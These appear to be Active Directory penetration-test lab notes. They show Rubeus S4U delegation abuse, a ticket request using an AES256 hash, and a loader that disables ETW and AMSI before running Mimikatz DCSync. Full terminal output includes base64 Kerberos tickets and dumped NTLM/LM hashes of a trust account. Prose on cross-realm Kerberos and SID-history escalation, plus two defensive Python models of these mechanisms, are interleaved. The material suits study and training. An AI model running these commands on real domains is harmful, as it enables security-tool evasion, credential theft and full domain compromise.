58e2540d3c585257e36efe54009a6f2024c68dcced255254d25c4d0d812da2d2
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\DCORP-STD163$'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):


[*] Action: S4U

[*] Building S4U2self request for: '[email protected]'


[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2self request to 172.16.2.1:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to '[email protected]'
[*] base64(ticket.kirbi):


[*] Impersonating user 'Administrator' to target SPN 'http/dcorp-mgmt.dollarcorp.moneycorp.local'


[*] Building S4U2proxy request for service: 'http/dcorp-mgmt.dollarcorp.moneycorp.local'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2proxy request to domain controller 172.16.2.1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'http/dcorp-mgmt.dollarcorp.moneycorp.local':

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
[+] Ticket successfully imported!

C:\Windows\system32>klist

Current LogonId is 0:0x2125aa

Cached Tickets: (1)

#0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL


Server: http/dcorp-mgmt.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 7/4/2024 8:54:03 (local)
End Time: 7/4/2024 18:54:03 (local)
Renew Time: 7/11/2024 8:54:03 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

C:\Windows\system32>winrs -r:dcorp-mgmt.dollarcorp.moneycorp.local whoami


dcorp\administrator

C:\Windows\system32>winrs -r:dcorp-mgmt.dollarcorp.moneycorp.local hostname


dcorp-mgmt

Cross Domain Attacks

Kerberos across trusts

For a user to access resources in another domain of the same forest, the Kerberos process involves an extra layer, since the KDC of one domain cannot issue a service ticket for a service in another domain. A service ticket can only be built with the target service's password data, and a domain controller holds the password data only for the security principals of its own domain, so the user's DC does not have the target's password data and cannot create the TGS. To resolve this, the two domains in the same forest share a trust password that is used as a bridge, enabling Kerberos authentication across domains.

Once there is a trust between two domains (domain BLUE and domain GREEN, both in the same AD forest for this example), the ticket-granting service of each domain ("realm" in Kerberos speak) is registered as a security principal with the other domain's Kerberos service (KDC). This lets the ticket-granting service in each domain treat the one in the other domain as just another service, providing cross-domain access to resources in the other domain.

1. AS-REQ

The ticket request from the user (Domain BLUE) contains a timestamp encrypted with the user's password. The domain controller receives the request and, since it has access to all the passwords in its own domain, it decrypts the timestamp sent by the user and verifies that the timestamp is current.

2. AS-REP

The domain controller sends back a ticket-granting ticket (TGT) together with a session key encrypted with the user's password. The TGT contains the same session key, but inside the TGT it is encrypted with the krbtgt account's password, as is the TGT itself. The user receives both the TGT and the session key. Since the user does not have the krbtgt password, it cannot decrypt the TGT; it does decrypt the session key, which is encrypted with its own password.

3. Inter-Realm TGT

The user then sends a ticket request for a service in the other domain (Domain GREEN) to its own domain controller (Domain BLUE). The DC (Domain BLUE) first checks its local database to determine whether it hosts the requested service and does not find it in its domain. It then queries the Global Catalog, which has the information that the service is hosted in Domain GREEN, and checks whether Domain BLUE is trusted by Domain GREEN. Since trusts between two domains within a forest are two-way and transitive, a referral to Domain GREEN is sent to the user. As part of this referral, the KDC in Domain BLUE initiates the inter-realm authentication process and issues an inter-realm Ticket Granting Ticket (TGT) to the user, specifically for accessing services within Domain GREEN. When issuing the inter-realm TGT, the KDC in Domain BLUE signs it using the trust key shared between Domain BLUE and Domain GREEN; this guarantees the inter-realm TGT's authenticity and integrity. The domain controller (Domain BLUE) then sends the user the inter-realm TGT along with a session key encrypted with the user's password. The user receives both and decrypts the session key, since it is encrypted with the user's password.

4. TGS-REQ

The user then sends a ticket request for the service to the domain controller in Domain GREEN. The request contains the inter-realm TGT received in the previous step and an authenticator encrypted with the session key obtained in the previous step. The Domain GREEN DC decrypts the inter-realm TGT using the trust key, obtains the session key, and uses it to decrypt the authenticator sent by the user.

5. TGS-REP

The Domain GREEN DC sends a service ticket and a new session key to the user. The new session key is also included in the service ticket, but there it is encrypted with the service account's password, as is the service ticket itself. The copy of the new session key sent separately alongside the service ticket is encrypted with the trust key. The user receives the service ticket and the new session key; it decrypts the session key but cannot decrypt the service ticket, since it does not have the service account's password.

6. AP-REQ

The user sends the service ticket (which it could not decrypt) obtained in the previous step, along with an authenticator, to the service it needs to access. The authenticator is encrypted with the new session key from the previous step. The service decrypts the service ticket using the service account's password, obtains the session key, and uses it to decrypt the user's authenticator. The user is now authenticated to the service.
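The six steps above, modelled end to end in Python as an added example (this is not code from the lab notes). Realm names BLUE and GREEN follow the text; the principal names, keys and the toy cipher are constructed stand-ins for real Kerberos encryption. The model follows RFC 4120 in one detail the text glosses over: each TGS-REP's session key is encrypted under the session key of the ticket that was presented (first the TGT's, then the inter-realm TGT's), not under the user's password or the trust key. The cleartext sname on each ticket is what tells a KDC whether to open it with its own krbtgt key or with the trust key, which is exactly the property a forged inter-realm ticket relies on.

```python
import hashlib
import hmac
import json
import os
import time


def toy_encrypt(key: bytes, obj: dict) -> bytes:
    """Toy authenticated encryption standing in for a Kerberos etype (constructed):
    nonce || (plaintext XOR SHA-256 keystream) || HMAC-SHA256 tag."""
    pt = json.dumps(obj, sort_keys=True).encode()
    nonce = os.urandom(16)
    stream = b"".join(hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
                      for i in range(len(pt) // 32 + 1))
    ct = bytes(p ^ s for p, s in zip(pt, stream))
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()


def toy_decrypt(key: bytes, blob: bytes) -> dict:
    """Check the tag first so a wrong key (e.g. the user trying to open a TGT) fails cleanly."""
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("wrong key or tampered blob")
    stream = b"".join(hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
                      for i in range(len(ct) // 32 + 1))
    return json.loads(bytes(c ^ s for c, s in zip(ct, stream)))


class KDC:
    """One realm's AS/TGS. `keys` maps principal name -> long-term key; the trust key is
    stored under the other realm's krbtgt name (krbtgt/GREEN@BLUE), as AD does."""

    def __init__(self, realm: str, keys: dict):
        self.realm, self.keys = realm, keys

    def _ticket(self, sname: str, client: str, session_key: str) -> dict:
        # Cleartext sname tells the receiver which key opens the encrypted part.
        return {"sname": sname,
                "enc": toy_encrypt(self.keys[sname], {"client": client, "session_key": session_key})}

    def as_exchange(self, user: str, enc_timestamp: bytes):
        """Steps 1-2: verify the pre-auth timestamp, return TGT + session key for the user."""
        ts = toy_decrypt(self.keys[user], enc_timestamp)["ts"]
        if abs(time.time() - ts) > 300:
            raise ValueError("timestamp not current")
        sk = os.urandom(32).hex()
        return (self._ticket(f"krbtgt/{self.realm}@{self.realm}", user, sk),
                toy_encrypt(self.keys[user], {"session_key": sk}))

    def tgs_exchange(self, ticket: dict, authenticator: bytes, service: str):
        """Steps 3-5: open the presented ticket (own krbtgt key for a local TGT, trust key for an
        inter-realm TGT), check the authenticator, then issue a service ticket or a referral."""
        body = toy_decrypt(self.keys[ticket["sname"]], ticket["enc"])
        auth = toy_decrypt(bytes.fromhex(body["session_key"]), authenticator)
        if auth["client"] != body["client"]:
            raise ValueError("authenticator does not match ticket")
        sk = os.urandom(32).hex()
        if service in self.keys:                       # service hosted in this realm
            new_ticket = self._ticket(service, body["client"], sk)
        else:                                          # referral: inter-realm TGT under the trust key
            new_ticket = self._ticket(f"krbtgt/{service.split('@')[1]}@{self.realm}", body["client"], sk)
        # RFC 4120: the reply is encrypted under the presented ticket's session key.
        return new_ticket, toy_encrypt(bytes.fromhex(body["session_key"]), {"session_key": sk})


def service_accepts(service_key: bytes, ticket: dict, authenticator: bytes):
    """Step 6: the service opens the ticket with its own key and checks the authenticator."""
    body = toy_decrypt(service_key, ticket["enc"])
    auth = toy_decrypt(bytes.fromhex(body["session_key"]), authenticator)
    return auth["client"] if auth["client"] == body["client"] else None


def can_open(key: bytes, ticket: dict) -> bool:
    try:
        toy_decrypt(key, ticket["enc"])
        return True
    except ValueError:
        return False


def run_cross_realm_flow() -> dict:
    """alice@BLUE reaches http/web@GREEN. All names, passwords and keys are constructed."""
    trust_key = os.urandom(32)                                      # shared by both realms
    user_key = hashlib.sha256(b"BLUEalice" + b"constructed-password").digest()
    svc_key = os.urandom(32)
    blue = KDC("BLUE", {"alice@BLUE": user_key, "krbtgt/BLUE@BLUE": os.urandom(32),
                        "krbtgt/GREEN@BLUE": trust_key})
    green = KDC("GREEN", {"krbtgt/GREEN@GREEN": os.urandom(32),
                          "krbtgt/GREEN@BLUE": trust_key, "http/web@GREEN": svc_key})
    me = {"client": "alice@BLUE"}
    tgt, enc = blue.as_exchange("alice@BLUE", toy_encrypt(user_key, {"ts": time.time()}))
    tgt_sk = bytes.fromhex(toy_decrypt(user_key, enc)["session_key"])
    irtgt, enc = blue.tgs_exchange(tgt, toy_encrypt(tgt_sk, me), "http/web@GREEN")
    ir_sk = bytes.fromhex(toy_decrypt(tgt_sk, enc)["session_key"])
    st, enc = green.tgs_exchange(irtgt, toy_encrypt(ir_sk, me), "http/web@GREEN")
    svc_sk = bytes.fromhex(toy_decrypt(ir_sk, enc)["session_key"])
    return {"inter_realm_sname": irtgt["sname"],
            "service_saw": service_accepts(svc_key, st, toy_encrypt(svc_sk, me)),
            "user_can_read_tgt": can_open(user_key, tgt),
            "user_can_read_service_ticket": can_open(user_key, st)}
```

Running `run_cross_realm_flow()` returns the inter-realm ticket's sname (`krbtgt/GREEN@BLUE`), the client name the GREEN service accepted, and two `False` flags confirming that the user's own key opens neither the TGT nor the service ticket, which is the point the text makes in steps 2 and 5.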

Privilege escalation to Enterprise Admins abusing SID history and trust key

SID History

The SID (Security Identifier) is a unique identifier assigned to each security principal (e.g. user, group, computer). It identifies the principal within the domain and is used to control access to resources.

The SID history is a property of a user or group object that allows the object to retain its SID when it is migrated from one domain to another as part of a domain consolidation or restructuring. When an object is migrated to a new domain, it is assigned a new SID in the target domain. The SID history allows the object to retain its original SID, so that access to resources in the source domain is not lost.

SID history therefore allows a single user account to have multiple associated SID values.

For instance, the SID of an account with Domain Admin rights can be added to a normal user's SID history to grant them Domain Admin rights (the rights are not granted per se, but the modified account is treated as a domain admin when rights are checked).

SID history can be abused in two ways to escalate privileges within a forest.

Manipulating SID history requires domain administrator privileges in a target domain. If an adversary is able to compromise a child domain within a forest, SID history can be manipulated to gain administrative control of a parent domain.
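To make the mechanism concrete, here is an added example (not part of the lab notes) that models how a SID carried in sidHistory enters an access check, and what SID filtering would do to it. The two domain SIDs are the ones Get-DomainSID prints below; the user RID, group list and ACL are constructed. Within a forest, SID filtering (quarantine) is not enabled by default on the parent/child trust, which is why the technique described above works; it is enabled by default on forest and external trusts. The filter here is simplified: real SID filtering also has rules for well-known and built-in SIDs.

```python
# Domain SIDs as printed by Get-DomainSID in the lab notes.
CHILD_SID = "S-1-5-21-719815819-3726368948-3917688648"    # dollarcorp (child)
PARENT_SID = "S-1-5-21-335606122-960912869-3279953914"    # moneycorp (parent / forest root)
ENTERPRISE_ADMINS = f"{PARENT_SID}-519"                   # RID 519 is always Enterprise Admins
DOMAIN_ADMINS_PARENT = f"{PARENT_SID}-512"                # RID 512 is always Domain Admins

# Constructed scenario: a plain child-domain user and an ACL on a parent-domain object.
USER = f"{CHILD_SID}-1109"                                # constructed RID
USER_GROUPS = [f"{CHILD_SID}-513"]                        # Domain Users of the child domain
PARENT_ACL = [
    (ENTERPRISE_ADMINS, "FullControl"),
    (DOMAIN_ADMINS_PARENT, "FullControl"),
    (f"{CHILD_SID}-513", "Read"),                         # legitimate cross-domain grant
]


def domain_of(sid: str) -> str:
    """Strip the RID: the domain SID is everything before the last dash."""
    return sid.rsplit("-", 1)[0]


def token_sids(user_sid: str, group_sids: list, sid_history: list) -> set:
    """What ends up in the PAC/token: the account SID, its group SIDs and every sidHistory
    value. Access checks treat sidHistory entries exactly like group memberships."""
    return {user_sid, *group_sids, *sid_history}


def sid_filter(pac_sids: set, trusted_domain_sid: str) -> set:
    """Quarantine-style SID filtering performed by the trusting (parent) domain: keep only
    SIDs the trusted (child) domain could legitimately have issued. Simplified model."""
    return {s for s in pac_sids if domain_of(s) == trusted_domain_sid}


def access_check(sids: set, acl: list) -> set:
    """Rights granted to a token holding `sids` by an ACL of (sid, right) entries."""
    return {right for sid, right in acl if sid in sids}


def granted_without_filtering() -> set:
    # Intra-forest default: the parent trusts whatever SIDs the child's ticket carries.
    return access_check(token_sids(USER, USER_GROUPS, [ENTERPRISE_ADMINS]), PARENT_ACL)


def granted_with_filtering() -> set:
    # With filtering, the foreign Enterprise Admins SID is dropped before the check;
    # legitimate access granted to the child domain's own SIDs survives.
    pac = token_sids(USER, USER_GROUPS, [ENTERPRISE_ADMINS])
    return access_check(sid_filter(pac, CHILD_SID), PARENT_ACL)


def foreign_sids_in_pac() -> list:
    """Detection angle: SIDs in a child-domain user's PAC that the child domain could not
    have issued. When filtering strips such SIDs, Windows logs event 4675 (SIDs were filtered)."""
    pac = token_sids(USER, USER_GROUPS, [ENTERPRISE_ADMINS])
    return sorted(s for s in pac if domain_of(s) != CHILD_SID)
```

`granted_without_filtering()` returns both Read and FullControl because the parent-domain Enterprise Admins SID rides along in sidHistory; `granted_with_filtering()` returns only Read, and `foreign_sids_in_pac()` lists the single SID a defender would want to alert on.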

Using a combination of PowerView and Mimikatz, we can carry out a SID history attack from Windows. The following details need to be gathered:

• The FQDNs of the child and parent domains

• The child and parent domains' SID values

• The RC4 or AES hash of the trust key

Getting the Domain SIDs of the domain and the parent domain

PS C:\Windows\system32> Get-DomainSID
S-1-5-21-719815819-3726368948-3917688648
PS C:\Windows\system32> Get-DomainSID -Domain moneycorp.local
S-1-5-21-335606122-960912869-3279953914

Getting the RC4 or AES hash of the trust key

DCSync attack

We need to execute a DCSync attack to get the hash of the trust key. To execute a DCSync attack we need Domain Admin privileges.

We will open a command prompt with domain administrator privileges.

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True


[*] Username : OKA4EYW3
[*] Domain : PFDK92Z1
[*] Password : LYHS4E0B
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 3276
[+] LUID : 0x14052ed

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)


[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 20992749
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0x14052ed
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 7/4/2024 9:18:01 AM
EndTime : 7/4/2024 7:18:01 PM
RenewTill : 7/11/2024 9:18:01 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : az7QOLasLbeT2shWmTRwtIRfHHrZE62RdHyvmNv9izs=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new command prompt opens with Domain Administrator privileges. We will now run the DCSync attack to get the trust key.

C:\Windows\system32>C:\AD\Tools\Loader.exe -Path "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe" "lsadump::dcsync /user:dcorp\mcorp$" "exit"
[+] Successfully unhooked ETW!
[+] Successfully patched AMSI!
[+] URL/PATH : C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe Arguments :
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and @Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -Path
ERROR mimikatz_doLocal ; "-Path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe
ERROR mimikatz_doLocal ; "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe" command of "standard" module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # lsadump::dcsync /user:dcorp\mcorp$


[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\mcorp$' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : mcorp$

** SAM ACCOUNT **

SAM Username : mcorp$


Account Type : 30000002 ( TRUST_ACCOUNT )
User Account Control : 00000820 ( PASSWD_NOTREQD INTERDOMAIN_TRUST_ACCOUNT )
Account expiration :
Password last change : 6/13/2024 9:05:32 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-1103
Object Relative ID : 1103

Credentials:
Hash NTLM: a8f73b279dc7257c7a8a2d0c911043d2
ntlm- 0: a8f73b279dc7257c7a8a2d0c911043d2
ntlm- 1: 692acf0a13b6446ee4898339932172be
ntlm- 2: 692acf0a13b6446ee4898339932172be
ntlm- 3: 692acf0a13b6446ee4898339932172be
ntlm- 4: d561ee73c6cbeea0a46457b8009aa170
ntlm- 5: be4adc80e847ea04dc6b44bf76b0d806
ntlm- 6: fab81df66adf534a1b064ec6e3dac658
ntlm- 7: 5bc8ac591b88a413f28d5977661e8e52
ntlm- 8: 5bc8ac591b88a413f28d5977661e8e52
ntlm- 9: 442dfe8d5e24bbef3bde661bcd435841
ntlm-10: 2034b61855f67d4eada3defb991940b0
ntlm-11: 2034b61855f67d4eada3defb991940b0
ntlm-12: 59b22ea0b63b069463456711ce6649a4
ntlm-13: 59b22ea0b63b069463456711ce6649a4
ntlm-14: 97c70358b2f68c8707275d60b04a39d5
ntlm-15: 97c70358b2f68c8707275d60b04a39d5
ntlm-16: 4166f5131d707f71bc4d94a20df1182b
ntlm-17: 2469e03430738ec884ca9d79b90f6753
ntlm-18: f13c02cdc42c545eb976669aff273ca4
ntlm-19: 3199214e479a6d209711d7f653fdfa8d
ntlm-20: 3199214e479a6d209711d7f653fdfa8d
ntlm-21: 3199214e479a6d209711d7f653fdfa8d
ntlm-22: b8cfd19d366afa9f36221b305b5440bf
ntlm-23: 802514a59894e499cf292415c8d152c2
lm - 0: 880dffbd466245d4be9c70704eca53b8
lm - 1: f8cbb505e871df29e23ae4a4a2778ea9
lm - 2: 55cc1e9ea4b061514d1f1f3210effa29
lm - 3: f7f56c8afa31aee7f9fc684aaa6c46b2
lm - 4: 9ee32eba930a8ee88906c21699e451af
lm - 5: 26da753345f8b98046743d8a293be3cb
lm - 6: f81c7c0d0a34de15f9de642b6d42caeb
lm - 7: d62b628d55aa9162f8dc450360bc357f
lm - 8: 83d93a76dbfa00df70234493e73a6ce3
